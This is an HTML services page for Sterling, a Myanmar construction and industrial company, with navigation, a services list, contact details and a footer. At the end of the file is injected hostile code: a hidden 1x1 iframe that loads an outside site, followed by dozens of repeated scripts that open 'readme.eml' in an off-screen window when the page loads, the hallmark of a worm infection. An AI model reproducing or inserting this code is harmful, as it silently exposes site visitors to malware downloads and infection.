<!DOCTYPE html>
<html>
    <head>
        <title>

        </title>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <style>

            *{padding:0;
              margin: 0;}


              #wrapper{
                /* border: solid gray; */
                

            }

            .bd{
                size: 500px;
            }
            #header{
            
                background-color:olivedrab;;
            }

            #logo{height: 70px;
            width: 10px;
            padding-left: 25px;}

            #navbar{
                /* height:50px;
                background-color: #FFCC00;
                margin-top:10px ; */
                overflow: hidden;
                font-family: Arial;
            }

            .navbar a{
                float: left;
                font-size: 16px;
                /* color: white; */
                text-align: center;
                padding: 14px 16px;
                text-decoration: none;
            }

            .dropdown{
                position: relative;
                display: inline-block;
            }

            .dropdown dropbtn{
                font-size: 16px;
                border:none;
                outline: none;
                color: olivedrab;
                padding: 14px 16px;
                background-color: inherit;
                font-family: inherit;
                margin: 0;
                /* background-color: olivedrab; */

            }

            .dropdown-content{
                display:none;
                position:absolute;
                background-color:olivedrab;
                min-width: 160px;
                box-shadow: 0px 8px 16px;
            }

            .dropdown-content a{
                float:none;
                color: black;
                padding: 12px 16px;
                text-decoration: none;
                display: block;
                text-align: left;
            }

            .dropdown-content a:hover{
                background-color: olivedrab;
            }

            .dropdown:hover .dropdown-content{
                display: block;
            }

            .img1,.img2,.img3,.img4{
                border-style: ridge;

            }

            .dc{
                background-color:whitesmoke;
            }

           

            #container{
                
                margin-top: 10px;


            }
            
            #container::after{
                content: " ";
                display: block;
                clear: both;

            }

            #left-pannel{

                height:600px;
                background-color:white;
                padding-left: 50px;
                width: 40%;
                float: left;
                margin-top: 10px;
            }
        
            #right-content{
                width: 54%;
                background-color: white;
                height:600px ;
                float:right;
                margin-top: 10px;
            }

            .td4
            {

                padding-left: 100px;
                padding-right: 300px;
            }

        
            
            p,ul,u{
                padding-left:100px;
                /* text-decoration-line: underline;
                text-decoration-color: gren; */
            }
            .divu{
                padding-left: 500px;
                padding-top: 20px;
                
                
            }

            a{
                text-decoration: none;
            }

            .td3{
                padding-top: 50px;            }
           

            .td0,.td1,.td2,.td3{padding-left: 120px;}
            .ul2{
                list-style-type: disks;
            }

            .ho{
                text-decoration: none;
                color: darkblue;
            }

            a{
                color: black;
                text-decoration-line: line-through;            }

            #footer{
                text-align: center;
                height: 30px;
                padding: 20px;
                background-color:darkgreen;
                margin-top:0px;
            }
        </style>
    </head>
    <body class="bd">
        <div id="wrapper">
             <div id="header">
                 <table width="1335px">
                     <tr>
                         <td class="td4">
                 <div id="logo">
                     <image src="stl_logo.png"></image>
                     </td>
                     <td class="td5">
                 </div id="navbar">
                 <a href="">Home</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                 <div class="dropdown">
                     <button class="dropbtn">Ahout Us&nbsp;<i class="fa fa-caret-down"></i></button>
                     <div class="dropdown-content">
                         <a hret="">Profile</a>
                         <a href="">Our Structure</a>
                         <a href="">Our Commitment</a>
                     </div>
                 </div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                 <a href="">Services</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                 <div class="dropdown">
                    <button class="dropbtn">Projects&nbsp;<i class="fa fa-caret-down"></i></button>
                    <div class="dropdown-content">
                        <a hret="">Industrial</a>
                        <a href="">Commercial</a>
                        <a href="">Construction & Interior</a>
                        <a href="">Infrasture</a>
                    </div>
                </div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                <a href="">Activities</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                <a href="">Contact Us</a>
                </td>
                </tr>
                </table>

                 </div>

             </div>

             <div class="divu"><b><u>OUR SERVICES</u></b></div>

             <div id="container">
                 <div id="left-pannel">
                    <p>You're Solution for Industrial Development and Construction in Myanmar.</p><br><br>
                    <ul>
                       <ol> <i class="fa fa-check" style="color: green;"></i>&nbsp;&nbsp;Design & Build</ol>
                        
                       <ol><i class="fa fa-check" style="color: green;"></i>&nbsp;&nbsp;Turnkey</ol>
                        <ol><i class="fa fa-check" style="color: green;"></i>&nbsp;&nbsp;Joint Venture</ol>
                        <ol><i class="fa fa-check" style="color: green;"></i>&nbsp;&nbsp;Business Consultancy</ol>
                       <ol> <i class="fa fa-check" style="color: green;"></i>&nbsp;&nbsp;Main Contractor</ol>
                    </ul><br>
                    <p>Whatever we do, whever are in construction, the impact for time , budget<br>
                        and quality is beyond customer expection.</p><br><br>
                    <u>Projects</u><br><br>
                    <ul>
                        <li>Construction and interior</li>
                        <li>Commercial</li>
                        <li>Industrial</li>
                        <li>Infrastures</li>
                    </ul>
                 </div>
                 <div id="right-content">
                     <table>
                         <tr>
                             <td>
                                <a href=""><img class="img1" src="1_services.jpg" width="250px" height="250px"></a><br><br>

                                <a href=""><img class="img2" src="2_services.jpg" width="250px" height="250px"></a>
                            </td>
                            <td class="td0">

            
                                <a href=""><img class="img3" src="3_services.jpg" width="250px" height="250px"></a><br><br>
                                <a href=""><img class="img4" src="4_services.jpg" width="250px" height="250px"></a>
                             </td>
                            </tr>
                        </table>
                 </div>
             </div>
             <div class="dc">
                 <table >
                     <tr>
                         <td class="td1">
                             <u>QUICK LINKS</u><br><br>
                            <ul>
                                <li>Home</li>
                                <li>About Us</li>
                                <li>Services</li>
                                <li>Project</li>
                                <li>Activities</li>
                                <li>Contact Us</li>
                            </ul>

                         </td>
                         <td class="td2">
                             <u>CONTACT US</u><br><br>
                             <ul>
                                 <i class="fa fa-map-marker" style="color:green"></i>&nbsp;&nbsp;Room - 1008, 10th Floor,Building - B, 
                                 50th Street Condominium,50th Street,
                                 Botahtaung Township,Yangon,Myanmar.<br><br>
                                 <i class="fa fa-phone" style="color: green;"></i>&nbsp;&nbsp;+(95) 9 451299988, +(95) 9 5351714<br><br>
                                 <i class="fa fa-envelope-o" style="color: green;"></i>&nbsp;&nbsp;info@sterling-myanmar.com
                                </ul>
                         </td>
                     </tr>
                     <tr class="tr" >
                         <td class="td3" colspan="2">
                          <u>FACEBOOK LINKS</u>
                          <ul><a href="https://www.facebook.com/Sterling-Industrial-Technologies-Co-Ltd-167138143479014/"><img src="fl.jpg" width="250px" height="250px"></img></a></ul>
                              
                          </ul>
                        </td>
                     </tr>
                 </table>
             </div>
             <div id="footer">Copyright&copy;STERLING MYANMAR. All Right Reserved. | Designed By <a href="" class="ho">Host Myanmar</a></div>
             

        </div>
        
    <iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 